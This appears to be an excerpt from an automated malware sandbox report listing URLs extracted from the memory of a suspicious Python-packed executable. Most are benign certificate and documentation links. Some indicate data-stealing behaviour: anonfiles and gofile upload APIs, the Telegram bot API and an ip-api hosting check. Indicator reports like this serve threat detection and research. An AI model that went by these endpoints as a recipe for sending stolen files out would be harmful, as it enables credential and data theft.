http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _sqlite3.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399381962.000001F12AC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: powershell.exe, 00000007.00000002.2222117000.000001B991E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03CCF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000002.2414627174.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000002.2414627174.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049688627.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048802049.000001F12AE54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2397711771.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397324147.000001F12B4EF000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397218402.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftNAV_CO~1.JSOy.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftTASKLI~1.TXTy.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2145008489.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2080721339.000001F12B4E9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2170214194.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172503654.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2079501485.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftXULSTO~1.JSOy.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload-
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050265595.000001F12B470000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050777050.000001F12B470000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE76000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050661555.000001F12AE79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
